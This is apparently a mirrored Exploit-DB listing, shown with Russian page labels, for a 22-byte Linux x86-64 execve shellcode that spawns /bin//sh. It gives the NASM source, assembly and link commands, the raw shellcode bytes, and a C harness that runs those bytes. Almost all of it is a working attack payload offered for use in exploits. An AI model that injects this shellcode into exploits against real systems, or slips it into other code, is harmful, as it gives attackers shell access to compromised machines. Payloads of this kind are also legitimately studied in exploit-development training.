- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38239
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- D4SH&R
- Тип уязвимости
- SHELLCODE
- Платформа
- LINUX_X86-64
- CVE
- N/A
- Дата публикации
- 2015-09-18
Linux/x64 - execve() Shellcode (22 bytes)
	
	
	
		
								
		Код:
	
	;Title: execve shellcode 22 bytes
;Author: d4sh&r
;Contact: https://mx.linkedin.com/in/d4v1dvc
;Category: Shellcode
;Architecture:linux x86_64
;SLAE64-1379
;Description:
;Shellcode in 22 bytes to get a shell 
;Tested on : Linux kali64 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 x86_64 GNU/Linux
;Compilation and execution
;nasm -felf64 shell.nasm -o shell.o
;ld shell.o -o shell
;./shell
global _start
_start:
	mul esi
	push rdx                         
	mov rbx, 0x68732f2f6e69622f ;/bin//sh 
	push rbx
	lea rdi, [rsp] ;address of /bin//sh
	mov al, 59 ;execve
	syscall
/*compile with gcc -fno-stack-protector -z exestack */
unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
main()
{
   int (*ret)()=(int(*)()) code;
    ret();
}- Источник
- www.exploit-db.com
 
 
		